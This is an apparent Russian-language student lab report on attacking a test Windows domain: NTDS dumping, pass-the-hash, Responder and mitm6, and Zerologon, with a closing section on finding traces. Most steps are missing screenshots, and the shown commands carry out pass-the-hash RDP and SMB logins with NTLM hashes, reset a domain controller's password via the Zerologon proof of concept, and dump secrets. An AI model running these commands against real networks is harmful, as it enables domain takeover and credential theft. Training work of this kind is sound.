# **Практическая работа №6** --- # Занятие 6 - *Базовые атаки и компрометация доменной Windows-инфраструктуры* # Задание: 1) Провести анализ базы NTDS 2) Выполнить атаку “Path-the-hash” 3) Реализовать атаки на базовые протоколы Windows ## Часть 1. Базовые атаки на инфраструктуру Windows ### Этап 1. Анализ базы NTDS #### 1.1 Бэкап NTDS   #### 1.2 Перенос NTDS   #### 1.3 Анализ NTDS    ### Этап 2. Path-the-hash #### 2.1 Crackmapexec  #### 2.2 XFreeRDP  ``` powershell New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedA dmin" -Value "0" -PropertyType DWORD -Force ```   ``` bash xfreerdp /d:pt.local /u:administrator /v:192.168.10.200 /pth:47b7769d0649df31863071ec8c2b9665 ``` ps: скриншот подключения по rdp никаким образом не хотел вставляться в отчёт  ### Этап 3. Атаки на базовые протоколы Windows #### Анализ инфраструктуры через responder       #### mitm6     ```bash python3 smbserver.py -smb2support SMB /root/SMB ```    # Задание: 1) Провести эксплуатацию уязвимостей контроллера домена 2) Найти следы эксплуатации уязвимостей   ## Часть 2. Эксплуатация уязвимостей контроллера домена ```bash git clone https://github.com/risksense/zerologon ```  ```bash python3 set_empty_pw.py DC1 192.168.10.200 ```  ```bash git clone https://github.com/SecureAuthCorp/impacket ```  ```bash python3 secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'PT/DC1$@192.168.10.200' ```  ```bash crackmapexec smb 192.168.10.200 -u ADMPetr -H 05df2fd1109e3d3b60f110965f6af128 -x whoami ```  ### Часть 3. Поиск следов эксплуатации уязвимостей    
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up